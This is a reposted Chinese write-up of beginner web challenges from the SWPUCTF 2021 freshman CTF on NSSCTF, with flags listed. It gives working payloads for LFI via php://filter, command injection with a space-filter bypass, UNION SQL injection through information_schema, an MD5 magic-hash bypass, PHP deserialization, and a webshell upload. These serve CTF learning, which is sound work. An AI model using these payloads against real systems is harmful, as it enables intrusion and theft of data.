我的编程空间,编程开发者的网络收藏夹
学习永远不晚

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

[SWPUCTF] 2021 新生赛(NSSCTF刷题记录wp)

NSSCTF平台:https://www.nssctf.cn/

[SWPUCTF 2021 新生赛]gift_F12

直接查看源代码F12flag即可。
在这里插入图片描述

NSSCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft}

[第五空间 2021]签到题

NSSCTF{welcometo5space}

[SWPUCTF 2021 新生赛]jicao

highlight_file('index.php');include("flag.php");$id=$_POST['id'];$json=json_decode($_GET['json'],true);if ($id=="wllmNB"&&$json['x']=="wllm"){echo $flag;}?>

所以为满足if条件,输出flag,构造Payload:

get:json={"x":"wllm"}post:id=wllmNB   

在这里插入图片描述

NSSCTF{037de6d6-3b9e-4bb9-903f-4236c239b42a}

[SWPUCTF 2021 新生赛]easy_md5

  highlight_file(__FILE__); include 'flag2.php'; if (isset($_GET['name']) && isset($_POST['password'])){    $name = $_GET['name'];    $password = $_POST['password'];    if ($name != $password && md5($name) == md5($password)){        echo $flag;    }    else {        echo "wrong!";    } }else {    echo 'wrong!';}?>

这里就是md5碰撞了 这里要求ab输入值不相同,md5加密后的值弱类型相等,就想到了0e的科学计数法

这里需要让password != name 又需要让他们的md5值相等,所以我们需要md5绕过 这里可以用bphackbar

QNKCDZO,s878926199a

在这里插入图片描述
在这里插入图片描述

NSSCTF{bc1ccfc9-194c-4f11-809a-3a39293691fc}

[SWPUCTF 2021 新生赛]caidao

直接告诉了密码 蚁剑直接连 flag在根目录下面。
在这里插入图片描述
在这里插入图片描述

NSSCTF{6bb489d4-e364-4302-ad0a-35cb90ee4534}

[SWPUCTF 2021 新生赛]include

在这里插入图片描述

Payload:?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述
在这里插入图片描述

NSSCTF{4b858152-b482-4984-a358-ad8dc781923e}

[SWPUCTF 2021 新生赛]easyrce

在这里插入图片描述

?url=system("ls /");  #发现了 flllllaaaaaaggggggg 

在这里插入图片描述
在这里插入图片描述

NSSCTF{4ddfeb4b-a30e-42a9-8bf4-f8a480a8b083}

[SWPUCTF 2021 新生赛]easy_sql

在这里插入图片描述
这里告诉我们了传入的参数是wllm 发现有报错,说明存在注入点 存在字符型注入 用order by 查询字段数,查得字段数为3输入4就报错

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

?wllm=-1' union select 1,2,3 --+  ##-1  一个负数不存在的id值来触发报错

在这里插入图片描述

-1' union select 1,2,database(); --+  ##爆破数据库

在这里插入图片描述

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='test_db'--+  #爆破表

在这里插入图片描述
这里有两个表test_tbuserstables的字段替换成column字段先看test_tb

wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='test_tb'--+

在这里插入图片描述

-1' union select 1,2,group_concat(id,flag) from test_tb --+ #查询

在这里插入图片描述

NSSCTF{94713769-163e-4e8d-a310-98e17dd7bd37}

[第五空间 2021]WebFTP

使用御剑扫描后台访问phpinfo.php 搜索FLAG即可。

在这里插入图片描述

在这里插入图片描述

NSSCTF{5d64eb71-b973-4708-a275-8f0cf576990b}

[SWPUCTF 2021 新生赛]babyrce

 <?phperror_reporting(0);header("Content-Type:text/html;charset=utf-8");highlight_file(__FILE__);if($_COOKIE['admin']==1) {    include "../next.php";}else    echo "小饼干最好吃啦!";?> 小饼干最好吃啦!

bp抓包改cookieadmin=1 出现了rasalghul.php进行访问 然后又是代码审计

在这里插入图片描述

 <?phperror_reporting(0);highlight_file(__FILE__);error_reporting(0);if (isset($_GET['url'])) {  $ip=$_GET['url'];  if(preg_match("/ /", $ip)){      die('nonono');  }  $a = shell_exec($ip);  echo $a;}?> 

这里是烧过空格 ?url=cat${IFS}/f*
在这里插入图片描述

NSSCTF{4f2323c6-1c66-49d4-98c0-65f184730a7b}

[SWPUCTF 2021 新生赛]Do_you_know_http

在这里插入图片描述
直接抓包然后修改User-Agent:WLLM和本地访问X-Forwarded-For:127.0.0.1 访问/secretttt.php即可得到flag

在这里插入图片描述
在这里插入图片描述

NSSCTF{1c22fbcd-0661-40d6-921c-01b09b3257a6}

[SWPUCTF 2021 新生赛]ez_unserialize

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

 <?phperror_reporting(0);show_source("cl45s.php");class wllm{    public $admin;    public $passwd;    public function __construct(){        $this->admin ="user";        $this->passwd = "123456";    }        public function __destruct(){        if($this->admin === "admin" && $this->passwd === "ctf"){            include("flag.php");            echo $flag;        }else{            echo $this->admin;            echo $this->passwd;            echo "Just a bit more!";        }    }}$p = $_GET['p'];unserialize($p);?> 

这里的考点就是反序列 可以参考大佬文章:https://blog.csdn.net/solitudi/article/details/113588692

Payload:?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

在这里插入图片描述

NSSCTF{1387617d-68fc-4c72-aef2-f6bbafc59ed3}

[SWPUCTF 2021 新生赛]easyupload1.0

在这里插入图片描述
新建一个一句话木马格式改为php然后抓包 使用phtml 然后使用WebSell工具连接 发现连接成功!!!

在这里插入图片描述
在这里插入图片描述
然后这个FLAG是假的怎么提交都不对 发现.git提示 尝试写个phpinfo(); 🆗得到FLAG

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

NSSCTF{7022989b-6f80-433c-b625-0e3ab22c0803}

[SWPUCTF 2021 新生赛]easyupload2.0

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

NSSCTF{41784aaa-7609-4a3e-8c92-7d5ea8efb3a9}

在这里插入图片描述

🆗感谢大家观看 这篇就先到这里了,都是些比较入门的题目,希望对刚入门CTF想刷题的小伙伴有帮助感谢大家的支持!

来源地址:https://blog.csdn.net/Aluxian_/article/details/130184133

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

[SWPUCTF] 2021新生赛之(NSSCTF)刷题记录 ①

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录